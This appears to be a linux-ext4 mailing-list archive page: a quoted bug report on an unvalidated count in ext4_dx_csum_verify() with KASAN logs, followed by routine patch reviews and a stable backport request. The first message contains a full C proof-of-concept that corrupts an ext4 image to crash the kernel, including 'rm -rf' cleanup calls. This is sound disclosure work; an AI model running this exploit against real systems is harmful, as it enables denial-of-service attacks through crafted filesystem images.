>
> I came across the Sashiko AI review [1] of this patch and was able to
> reproduce a kernel crash triggered by a missing bounds check in
> ext4_dx_csum_verify(). Although the review notes this is a pre-existing
> issue (not introduced by your patch), I wanted to share the concrete
> reproduction evidence since this patch touches the same function.
>
> On Fri, Jun 19, 2026 at 03:10:05PM -0400, Artem Blagodarenko wrote:
> > @@ -456,7 +456,7 @@ static __le32 ext4_dx_csum(struct inode *inode,
> struct ext4_dir_entry *dirent,
> > }
> >
> > static int ext4_dx_csum_verify(struct inode *inode,
> > - struct ext4_dir_entry *dirent)
> > + struct ext4_dir_entry_2 *dirent)
> > {
> > struct dx_countlimit *c;
> > struct dx_tail *t;
>
> The problem is in the validation logic inside this function:
>
> c = get_dx_countlimit(inode, dirent, &count_offset);
> limit = le16_to_cpu(c->limit);
> count = le16_to_cpu(c->count); // ← read from disk, never
> validated
>
> if (count_offset + (limit * sizeof(struct dx_entry)) >
> EXT4_BLOCK_SIZE(inode->i_sb) - sizeof(struct dx_tail)) {
> warn_no_space_for_csum(inode);
> return 0;
> }
>
> t = (struct dx_tail *)(((struct dx_entry *)c) + limit);
>
> size = count_offset + (count * sizeof(struct dx_entry)); // ← uses
> unvalidated count
> csum = ext4_chksum(ei->i_csum_seed, (__u8 *)dirent, size);
> → crc32c() reads `size` bytes from bh->b_data
>
> The `limit` value is bounds-checked against the block size, but `count`
> is never validated. If a corrupted or maliciously crafted filesystem
> sets `count` to a large value like 65535, the computation:
>
> size = count_offset + (65535 * 8) = ~524288 bytes
>
> causes crc32c() to read far past the 4096-byte buffer_head allocation.
>
> Why KASAN reports this as use-after-free rather than out-of-bounds:
>
> The buffer_head's b_data is a kmalloc'd slab object. When crc32c()
> reads hundreds of kilobytes past the end of this 4K slab allocation, it
> crosses into adjacent slab pages. Those pages contain memory that was
> previously allocated and freed (old dentries, inode structures, etc.).
> KASAN's quarantine poisons freed slab objects, so the access lands on a
> poisoned freed page and triggers the slab-use-after-free detector:
>
> BUG: KASAN: use-after-free in crc32c+0x32a/0x380
> Read of size 1 at addr ffff88802ca54000 by task poc/10993
>
> The crash is deterministic with a crafted image and triggers on any
> directory read (getdents64 / ls).
>
> [Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]
>
> Call Trace:
> <TASK>
> dump_stack_lvl
> print_report
> kasan_report
> crc32c+0x32a/0x380
> __ext4_read_dirblock+0x90f/0xbb0
> dx_probe+0xbb/0x1670
> ext4_htree_fill_tree+0x50e/0xb30
> ext4_readdir+0x241b/0x39d0
> iterate_dir+0x29b/0xaf0
> __x64_sys_getdents64+0x140/0x2c0
> do_syscall_64+0x129/0x880
> entry_SYSCALL_64_after_hwframe+0x77/0x7f
> </TASK>
>
> The PoC is attached below. It creates a 64 MB ext4 image with
> metadata_csum and dir_index, fills a directory with 800 files to
> trigger htree indexing, unmounts, then corrupts the dx_countlimit's
> count field via direct block write before remounting and listing the
> directory.
>
> gcc -o poc poc.c -static
>
> [1]
> https://sashiko.dev/#/patchset/20260619191022.27008-1-ablagodarenko%40thelustrecollective.com
> (Sashiko AI code review — "Out-of-Bounds Access", Severity: High)
>
> Thanks,
> XIAO
>
> // PoC: OOB read via unvalidated count in ext4_dx_csum_verify()
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <sys/mount.h>
> #include <sys/stat.h>
> #include <fcntl.h>
> #include <errno.h>
> #include <sys/syscall.h>
> #include <stdint.h>
>
> #define IMG_PATH "poc_ext4.img"
> #define MNT_PATH "poc_mnt"
> #define IMG_SIZE (64 * 1024 * 1024)
> #define BLCK_SIZE 4096
>
> int main(int argc, char **argv)
> {
> char cmd[4096];
> int img_fd, ret;
> char loop_dev[64] = {0};
> unsigned char buf[BLCK_SIZE];
>
> printf("[*] ext4 dx_csum count OOB PoC\n");
>
> /* Cleanup from previous runs */
> system("umount poc_mnt 2>/dev/null");
> system("losetup -d /dev/loop0 2>/dev/null");
> system("rm -rf poc_mnt poc_ext4.img 2>/dev/null");
> mkdir(MNT_PATH, 0755);
>
> /* Create and format image with metadata_csum + dir_index */
> printf("[*] Creating 64 MB image, formatting ext4...\n");
> img_fd = open(IMG_PATH, O_CREAT | O_RDWR | O_TRUNC, 0644);
> if (img_fd < 0) { perror("open"); return 1; }
> ftruncate(img_fd, IMG_SIZE);
> close(img_fd);
> snprintf(cmd, sizeof(cmd),
> "mkfs.ext4 -F -O metadata_csum,dir_index,^has_journal "
> "-b %d %s 2>/dev/null", BLCK_SIZE, IMG_PATH);
> if (system(cmd) != 0) { fprintf(stderr, "mkfs failed\n"); return 1; }
>
> /* Setup loop device */
> printf("[*] Setting up loop...\n");
> snprintf(cmd, sizeof(cmd), "losetup -f %s 2>/dev/null && "
> "losetup -j %s | head -1 | cut -d: -f1", IMG_PATH, IMG_PATH);
> FILE *fp = popen(cmd, "r");
> if (fp) {
> if (fgets(loop_dev, sizeof(loop_dev), fp)) {
> char *nl = strchr(loop_dev, '\n');
> if (nl) *nl = '\0';
> }
> pclose(fp);
> }
> if (!strlen(loop_dev)) { fprintf(stderr, "loop setup failed\n");
> return 1; }
> printf("[*] Loop device: %s\n", loop_dev);
>
> /* Mount and create htree directory with 800 files */
> printf("[*] Mounting and creating htree directory...\n");
> if (mount(loop_dev, MNT_PATH, "ext4", 0, NULL) < 0) {
> perror("mount"); return 1;
> }
> mkdir(MNT_PATH "/dir", 0755);
> for (int i = 0; i < 800; i++) {
> char name[64];
> snprintf(name, sizeof(name), MNT_PATH "/dir/file_%04d", i);
> close(open(name, O_CREAT | O_WRONLY, 0644));
> }
> printf("[*] Unmounting to corrupt on-disk data...\n");
> umount(MNT_PATH);
>
> /*
> * Corrupt the dx_countlimit count field.
> * The htree root block is block 0 of the directory inode.
> * dx_countlimit is at offset 8 in the INDEX-type dx block:
> * struct dx_countlimit { __le16 limit; __le16 count; };
> * We set count = 0xFFFF (65535) to trigger massive OOB read.
> */
> printf("[*] Corrupting dx_countlimit.count in block 0...\n");
> img_fd = open(IMG_PATH, O_RDWR);
> if (img_fd < 0) { perror("open image"); return 1; }
> memset(buf, 0, BLCK_SIZE);
> /* Read block 0 of the directory inode. Directory inode is typically
> * inode #2 on a freshly formatted ext4. For simplicity we scan for
> * the INDEX signature (0x0A) at dx_root_info.dx_magic_offset. */
> /* Seek to block group 0's inode table — inode #2 is at offset
> * (2-1)*256 = 256 bytes into the inode table. The inode table starts
> * at block (superblock.s_first_ino_blocks + 1) or similar.
> * For standard ext4 with 4K blocks: inode table at block 1.
> * inode #2 at block 1 offset 256. i_block[0] gives the dir block. */
> unsigned char inode_buf[256];
> lseek(img_fd, BLCK_SIZE + 256, SEEK_SET); /* inode #2 */
> read(img_fd, inode_buf, 256);
> uint32_t dir_block = inode_buf[40] | (inode_buf[41]<<8) |
> (inode_buf[42]<<16) | (inode_buf[43]<<24);
> printf("[*] Directory root block: %u\n", dir_block);
>
> /* Read the dx root block, corrupt count at offset 10 (limit at 8,
> count at 10) */
> lseek(img_fd, dir_block * BLCK_SIZE, SEEK_SET);
> read(img_fd, buf, BLCK_SIZE);
> uint16_t *count_ptr = (uint16_t *)(buf + 10);
> printf("[*] Original count: %u, setting to 65535\n", *count_ptr);
> *count_ptr = 0xFFFF;
> lseek(img_fd, dir_block * BLCK_SIZE, SEEK_SET);
> write(img_fd, buf, BLCK_SIZE);
> fsync(img_fd);
> close(img_fd);
>
> /* Remount and trigger the bug by reading the directory */
> printf("[*] Remounting and triggering via getdents64...\n");
> if (mount(loop_dev, MNT_PATH, "ext4", 0, NULL) < 0) {
> perror("remount"); return 1;
> }
> /* ls triggers ext4_readdir → ext4_htree_fill_tree → dx_probe →
> csum verify */
> system("ls " MNT_PATH "/dir > /dev/null 2>&1");
> printf("[*] Done — check dmesg for KASAN report\n");
>
> umount(MNT_PATH);
> snprintf(cmd, sizeof(cmd), "losetup -d %s 2>/dev/null", loop_dev);
> system(cmd);
> return 0;
> }
>
>
^ permalink raw reply
* Re: [PATCH] ext4: cancel dirty accounting for folios without buffers
From: Jan Kara @ 2026-06-24 12:32 UTC (permalink / raw)
To: Zhu Jia
Cc: Zhang Yi, tytso, adilger.kernel, libaokun, jack, ojaswin,
ritesh.list, linux-ext4, linux-kernel, stable
In-Reply-To: <20260624094535.1-zhujia.zj@bytedance.com>
On Wed 24-06-26 17:52:06, Zhu Jia wrote:
> Hi Yi,
>
> Thanks for taking a look.
>
> Yes, clearing PAGECACHE_TAG_DIRTY/TOWRITE would make the page-cache state
> cleaner. I had a version that did this by adding a helper around
> folio_cancel_dirty() and clearing the xarray tags after confirming the
> folio was still the same clean page-cache entry.
>
> It looked like this:
>
> static void ext4_cancel_dirty_folio(struct address_space *mapping,
> struct folio *folio)
> {
> XA_STATE(xas, &mapping->i_pages, folio->index);
> unsigned long flags;
>
> folio_cancel_dirty(folio);
>
> xas_lock_irqsave(&xas, flags);
> if (xas_load(&xas) == folio && !folio_test_dirty(folio)) {
> xas_clear_mark(&xas, PAGECACHE_TAG_DIRTY);
> xas_clear_mark(&xas, PAGECACHE_TAG_TOWRITE);
> }
> xas_unlock_irqrestore(&xas, flags);
> }
>
> The reason I left the tags unchanged in this version is that I was not sure
> whether it is appropriate for ext4 to open-code xarray tag cleanup directly.
>
> If you think this is the right direction, I can add the helper back and
> send a v2.
That was a good judgement! Playing with xarray tags like this in filesystem
code is certainly not a good thing. For now, I'd leave the xarray tags
dangling - they will be eventually synced with reality on next writeback
attempt. If this inconsistency of tags needs to be fixed, the fix belongs
to the generic code (so that it can be used in other places as well).
Honza
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH 10/16] fs/buffer: Remove fs-layer decryption code
From: Jan Kara @ 2026-06-24 11:40 UTC (permalink / raw)
To: Eric Biggers
Cc: linux-fscrypt, linux-fsdevel, linux-ext4, linux-f2fs-devel,
linux-block, Christoph Hellwig, Theodore Ts'o, Andreas Dilger,
Baokun Li, Jan Kara, Ojaswin Mujoo, Ritesh Harjani, Zhang Yi,
Jaegeuk Kim, Chao Yu
In-Reply-To: <20260624050334.124606-11-ebiggers@kernel.org>
On Tue 23-06-26 22:03:28, Eric Biggers wrote:
> Now that fscrypt's file contents en/decryption is always implemented
> using blk-crypto when the filesystem is block-based, the fs-layer
> decryption code in fs/buffer.c is unused code. Remove it.
>
> Signed-off-by: Eric Biggers <ebiggers@kernel.org>
Fine by me. Feel free to add:
Reviewed-by: Jan Kara <jack@suse.cz>
Honza
> ---
> fs/buffer.c | 45 ++++++++-------------------------------------
> 1 file changed, 8 insertions(+), 37 deletions(-)
>
> diff --git a/fs/buffer.c b/fs/buffer.c
> index 9af5f061a1f8..21dd9596a941 100644
> --- a/fs/buffer.c
> +++ b/fs/buffer.c
> @@ -334,82 +334,53 @@ static void end_buffer_async_read(struct buffer_head *bh, int uptodate)
>
> still_busy:
> spin_unlock_irqrestore(&first->b_uptodate_lock, flags);
> }
>
> -struct postprocess_bh_ctx {
> +struct verify_bh_ctx {
> struct work_struct work;
> struct buffer_head *bh;
> struct fsverity_info *vi;
> };
>
> static void verify_bh(struct work_struct *work)
> {
> - struct postprocess_bh_ctx *ctx =
> - container_of(work, struct postprocess_bh_ctx, work);
> + struct verify_bh_ctx *ctx =
> + container_of(work, struct verify_bh_ctx, work);
> struct buffer_head *bh = ctx->bh;
> bool valid;
>
> valid = fsverity_verify_blocks(ctx->vi, bh->b_folio, bh->b_size,
> bh_offset(bh));
> end_buffer_async_read(bh, valid);
> kfree(ctx);
> }
>
> -static void decrypt_bh(struct work_struct *work)
> -{
> - struct postprocess_bh_ctx *ctx =
> - container_of(work, struct postprocess_bh_ctx, work);
> - struct buffer_head *bh = ctx->bh;
> - int err;
> -
> - err = fscrypt_decrypt_pagecache_blocks(bh->b_folio, bh->b_size,
> - bh_offset(bh));
> - if (err == 0 && ctx->vi) {
> - /*
> - * We use different work queues for decryption and for verity
> - * because verity may require reading metadata pages that need
> - * decryption, and we shouldn't recurse to the same workqueue.
> - */
> - INIT_WORK(&ctx->work, verify_bh);
> - fsverity_enqueue_verify_work(&ctx->work);
> - return;
> - }
> - end_buffer_async_read(bh, err == 0);
> - kfree(ctx);
> -}
> -
> /*
> * I/O completion handler for block_read_full_folio() - folios
> * which come unlocked at the end of I/O.
> */
> static void bh_end_async_read(struct bio *bio)
> {
> struct buffer_head *bh;
> bool uptodate = bio_endio_bh(bio, &bh);
> struct inode *inode = bh->b_folio->mapping->host;
> - bool decrypt = fscrypt_inode_uses_fs_layer_crypto(inode);
> struct fsverity_info *vi = NULL;
>
> /* needed by ext4 */
> if (bh->b_folio->index < DIV_ROUND_UP(inode->i_size, PAGE_SIZE))
> vi = fsverity_get_info(inode);
>
> - /* Decrypt (with fscrypt) and/or verify (with fsverity) if needed. */
> - if (uptodate && (decrypt || vi)) {
> - struct postprocess_bh_ctx *ctx = kmalloc_obj(*ctx, GFP_ATOMIC);
> + /* Verify (with fsverity) if needed. */
> + if (vi && uptodate) {
> + struct verify_bh_ctx *ctx = kmalloc_obj(*ctx, GFP_ATOMIC);
>
> if (ctx) {
> ctx->bh = bh;
> ctx->vi = vi;
> - if (decrypt) {
> - INIT_WORK(&ctx->work, decrypt_bh);
> - fscrypt_enqueue_decrypt_work(&ctx->work);
> - } else {
> - INIT_WORK(&ctx->work, verify_bh);
> - fsverity_enqueue_verify_work(&ctx->work);
> - }
> + INIT_WORK(&ctx->work, verify_bh);
> + fsverity_enqueue_verify_work(&ctx->work);
> return;
> }
> uptodate = false;
> }
> end_buffer_async_read(bh, uptodate);
> --
> 2.54.0
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* Re: [PATCH] ext4: zero non-uptodate buffers before encryption in writeback
From: Jan Kara @ 2026-06-24 11:32 UTC (permalink / raw)
To: Yun Zhou
Cc: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
yi.zhang, linux-ext4, linux-kernel
In-Reply-To: <20260624065948.85415-1-yun.zhou@windriver.com>
On Wed 24-06-26 14:59:48, Yun Zhou wrote:
> ext4_bio_write_folio() encrypts the folio content from offset 0 up to
> round_up(len, blocksize) before submitting IO. When blocksize < PAGE_SIZE,
> this range may include blocks that are not being written out (holes,
> delay, or unwritten blocks). If the folio was freshly allocated by the
> page cache (via write_begin) for a partial-page write, these non-target
> blocks may remain uninitialized from the buddy allocator.
>
> The encryption engine (AES-XTS) then reads these uninitialized bytes as
> operands, triggering a KMSAN uninit-value report in aes_encrypt().
>
> Fix this by zeroing any non-uptodate buffer that is not being written
> out, before calling fscrypt_encrypt_pagecache_blocks(). This ensures the
> crypto engine never operates on uninitialized data regardless of which
> blocks are actually being submitted for IO.
>
> The common case of blocksize == PAGE_SIZE is unaffected since there can
> be no non-overlapping blocks within a single-block folio.
>
> Reported-by: syzbot+7add5c56bc2a14145d20@syzkaller.appspotmail.com
> Closes: https://syzkaller.appspot.com/bug?extid=7add5c56bc2a14145d20
> Signed-off-by: Yun Zhou <yun.zhou@windriver.com>
Eric has just sent patch set that deletes this code [1]. So I think this
patch isn't needed anymore.
[1] lore.kernel.org/20260624050334.124606-1-ebiggers@kernel.org
Honza
> ---
> fs/ext4/page-io.c | 10 ++++++++++
> 1 file changed, 10 insertions(+)
>
> diff --git a/fs/ext4/page-io.c b/fs/ext4/page-io.c
> index bc674aa4a656..2d380b5a1501 100644
> --- a/fs/ext4/page-io.c
> +++ b/fs/ext4/page-io.c
> @@ -555,12 +555,22 @@ int ext4_bio_write_folio(struct ext4_io_submit *io, struct folio *folio,
> * block which might be needed. This may cause some unneeded blocks
> * (e.g. holes) to be unnecessarily encrypted, but this is rare and
> * can't happen in the common case of blocksize == PAGE_SIZE.
> + *
> + * Zero out any non-uptodate buffers that are not being written out,
> + * to prevent uninitialized memory from being fed into the crypto
> + * engine.
> */
> if (fscrypt_inode_uses_fs_layer_crypto(inode)) {
> gfp_t gfp_flags = GFP_NOFS;
> unsigned int enc_bytes = round_up(len, i_blocksize(inode));
> struct page *bounce_page;
>
> + do {
> + if (!buffer_async_write(bh) && !buffer_uptodate(bh))
> + folio_zero_range(folio, bh_offset(bh),
> + bh->b_size);
> + } while ((bh = bh->b_this_page) != head);
> +
> /*
> * Since bounce page allocation uses a mempool, we can only use
> * a waiting mask (i.e. request guaranteed allocation) on the
> --
> 2.43.0
>
--
Jan Kara <jack@suse.com>
SUSE Labs, CR
^ permalink raw reply
* [RESEND] "ext4: get rid of ppath in get_ext_path()" 6.6.y backport request
From: Yoann Congal @ 2026-06-24 10:24 UTC (permalink / raw)
To: stable
Cc: Baokun Li, Jan Kara, Ojaswin Mujoo, Theodore Ts'o,
Andreas Dilger, linux-ext4
Hello,
(Resent with developers/maintainers of the patch in CC)
I'd like to request the backport of
6b854d552711 ("ext4: get rid of ppath in get_ext_path()")
on the 6.6.y branch.
Rational:
6.6.130 commit fb138df7d886 ("ext4: get rid of ppath in ext4_ext_insert_extent()")
created a regression in ext4_ext_map_blocks() by changing the path value
under error (NULL -> ERR_PTR). But path is only checked for NULL value
in ext4_free_ext_path (not ERR_PTR).
The check is added in 6b854d552711 ("ext4: get rid of ppath in get_ext_path()"),
hence this backport request.
More details:
This regression was triggered during LTP test on a 6.6.129->6.6.142
upgrade for a Yocto Project stable branch:
https://autobuilder.yoctoproject.org/valkyrie/#/builders/98/builds/3837
-> https://valkyrie.yocto.io/pub/non-release/20260622-121/testresults/qemuarm64-ltp/core-image-sato/qemu_boot_log.20260623002740
[ 6952.500858] Unable to handle kernel paging request at virtual address ffffffffffffffec
[ 6952.503768] Mem abort info:
[ 6952.504431] ESR = 0x0000000096000005
[ 6952.505333] EC = 0x25: DABT (current EL), IL = 32 bits
[ 6952.506541] SET = 0, FnV = 0
[ 6952.507354] EA = 0, S1PTW = 0
[ 6952.508154] FSC = 0x05: level 1 translation fault
[ 6952.509208] Data abort info:
[ 6952.509849] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000
[ 6952.511175] CM = 0, WnR = 0, TnD = 0, TagAccess = 0
[ 6952.512372] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
[ 6952.513667] swapper pgtable: 4k pages, 39-bit VAs, pgdp=0000000041250000
[ 6952.514909] [ffffffffffffffec] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000
[ 6952.516423] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP
[ 6952.517503] Modules linked in: x_tables tun loop [last unloaded: ip6_tables]
[ 6952.518691] CPU: 1 PID: 1078 Comm: kworker/u12:1 Tainted: G W 6.6.142-yocto-standard #1
[ 6952.520269] Hardware name: linux,dummy-virt (DT)
[ 6952.521094] Workqueue: writeback wb_workfn (flush-7:0)
[ 6952.521985] pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[ 6952.523184] pc : ext4_ext_map_blocks+0x260/0x1860
[ 6952.524011] lr : ext4_ext_map_blocks+0xdb8/0x1860
[ 6952.524851] sp : ffffffc086a3b620
[ 6952.525421] x29: ffffffc086a3b740 x28: ffffffffffffffe4 x27: 000000000000808c
[ 6952.526624] x26: ffffff8017dd9000 x25: 000000000000808c x24: 0000000000000002
[ 6952.527849] x23: ffffff8035e766c8 x22: ffffff802e589690 x21: 000000000000042f
[ 6952.529087] x20: ffffffc086a3b948 x19: ffffff8035e767f0 x18: 0000000000000000
[ 6952.530310] x17: ffffffc081691310 x16: fffffffe001ab548 x15: 0000005564d4cb48
[ 6952.531519] x14: 00000000ffffffff x13: 0000000000000000 x12: ffffffffffffffc0
[ 6952.532683] x11: 0000000000000040 x10: ffffff8005d81d80 x9 : ffffffc0803cce14
[ 6952.533886] x8 : 00000000bab647bc x7 : 0000000000000000 x6 : 000000000000d847
[ 6952.535065] x5 : 0000000000000000 x4 : 0000000000316019 x3 : 0000000000000000
[ 6952.536264] x2 : 0000000000000000 x1 : 0000000000000000 x0 : ffffff803deec880
[ 6952.537425] Call trace:
[ 6952.537860] ext4_ext_map_blocks+0x260/0x1860
[ 6952.538589] ext4_map_blocks+0x19c/0x598
[ 6952.539258] ext4_do_writepages+0x5a4/0xbe0
[ 6952.539977] ext4_writepages+0x84/0x110
[ 6952.540624] do_writepages+0x94/0x1e0
[ 6952.541240] __writeback_single_inode+0x60/0x4d8
[ 6952.542086] writeback_sb_inodes+0x208/0x4b0
[ 6952.542812] __writeback_inodes_wb+0x58/0x118
[ 6952.543578] wb_writeback+0x274/0x440
[ 6952.544198] wb_workfn+0x3b0/0x5c8
[ 6952.544788] process_one_work+0x16c/0x3e0
[ 6952.545434] worker_thread+0x1b4/0x378
[ 6952.546059] kthread+0x118/0x128
[ 6952.546599] ret_from_fork+0x10/0x20
[ 6952.547197] Code: 2a0103f9 b9009fe1 b9000e99 b40055fc (79401398)
[ 6952.548170] ---[ end trace 0000000000000000 ]---
[ 6952.551090] ------------[ cut here ]------------
Reading the resulting code in 6.6.142:
fs/ext4/extents.c:
int ext4_ext_map_blocks(handle_t *handle, struct inode *inode,
struct ext4_map_blocks *map, int flags)
{
struct ext4_ext_path *path = NULL;
// ...
got_allocated_blocks:
path = ext4_ext_insert_extent(handle, inode, path, &newex, flags);
if (IS_ERR(path)) {
err = PTR_ERR(path);
/*
* Gracefully handle out of space conditions. If the filesystem
* is inconsistent, we'll just leak allocated blocks to avoid
* causing even more damage.
*/
// ...
goto out;
}
// ...
out:
ext4_free_ext_path(path);
trace_ext4_ext_map_blocks_exit(inode, flags, map,
err ? err : allocated);
return err ? err : allocated;
}
=> Under out of space condition (what LTP does a *LOT*): path is given unmodified to
ext4_free_ext_path() that only does a NULL check (no IS_ERR) before
dereferencing it. And that produces the oops and then, the LTP failure.
Notably, master commit 6b854d552711 ("ext4: get rid of ppath in get_ext_path()")
never got backported to 6.6.y. But does add the IS_ERR_OR_NULL() check
to ext4_free_ext_path:
void ext4_free_ext_path(struct ext4_ext_path *path)
{
+ if (IS_ERR_OR_NULL(path))
+ return;
Thanks!
--
Yoann Congal
Smile ECS
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox